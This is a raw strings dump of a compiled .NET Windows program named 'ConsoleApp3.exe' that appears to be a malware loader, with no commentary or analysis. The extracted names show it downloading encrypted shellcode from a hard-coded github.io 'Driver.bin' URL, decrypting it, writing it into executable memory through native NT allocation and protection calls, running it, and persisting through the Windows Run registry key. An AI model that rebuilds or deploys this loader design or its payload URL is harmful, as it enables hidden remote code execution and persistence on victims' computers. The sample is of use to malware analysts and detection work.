!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<LoadWithNT>b__5_0
Microsoft.Win32
ConsoleApp3
<Module>
PAGE_EXECUTE_READ
PAGE_GUARD
PAGE_NOCACHE
PAGE_WRITECOMBINE
MEM_RELEASE
PAGE_READWRITE
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE
MEM_RESERVE
MEM_RESET_UNDO
PAGE_NOACCESS
MEM_RESET
MEM_DECOMMIT
MEM_COMMIT
LoadWithNT
PAGE_READONLY
PAGE_WRITECOPY
PAGE_EXECUTE_WRITECOPY
value__
DownloadData
mscorlib
TypeAlloc
_disposed
<Asynchronous>k__BackingField
method
DownloadShellCode
encryptedShellCode
DecryptShellCode
shellCode
get_Message
EndInvoke
BeginInvoke
IDisposable
SafeHandle
_safeHandle
SafeFileHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
FreeConsole
WriteLine
get_None
FreeType
AllocationType
Dispose
MulticastDelegate
DebuggerBrowsableState
CompilerGeneratedAttribute
GuidAttribute
NeutralResourcesLanguageAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
SetValue
ConsoleApp3.exe
RegionSize
bufferSize
SuppressFinalize
System.Threading
System.Runtime.Versioning
String
disposing
AsyncCallback
callback
Marshal
kernel32.dll
ntdll.dll
Program
System
CancellationToken
written
get_Location
Action
System.Reflection
PageProtection
Exception
SetRegistryStartup
ShellCodeLoader
buffer
ShellCodeCaller
TaskScheduler
CurrentUser
GetDelegateForFunctionPointer
Crypter
UIntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
DebuggingModes
Microsoft.Win32.SafeHandles
numberOfBytes
System.Threading.Tasks
TaskCreationOptions
GetCurrentProcess
BaseAddress
ZeroBits
Imports
get_Asynchronous
set_Asynchronous
Concat
Object
object
oldProtect
newProtect
System.Net
op_Explicit
get_Default
IAsyncResult
result
WebClient
StartNew
OpenSubKey
RegistryKey
GetExecutingAssembly
NtFreeVirtualMemory
NtAllocateVirtualMemory
NtWriteVirtualMemory
NtProtectVirtualMemory
get_Factory
TaskFactory
Registry
WrapNonExceptionThrows
ConsoleApp3
Copyright
2024
$708169ff-d3e2-4a46-8fe3-5f5ecdb90ebf
1.0.0.0
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
C:\Users\H3OX\Desktop\New folder\ConsoleApp3\obj\Debug\ConsoleApp3.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
https://zakariya-ayt-amran.github.io/driver-/Driver.bin
Failed to decrypt shellcode.
Failed to download shellcode.
Failed to download shellcode:
Failed to decrypt shellcode:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to set registry startup:
ntdll.dll
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
ConsoleApp3
CompanyName
ConsoleApp3
FileDescription
ConsoleApp3
FileVersion
1.0.0.0
InternalName
ConsoleApp3.exe
LegalCopyright
Copyright
2024
LegalTrademarks
OriginalFilename
ConsoleApp3.exe
ProductName
ConsoleApp3
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0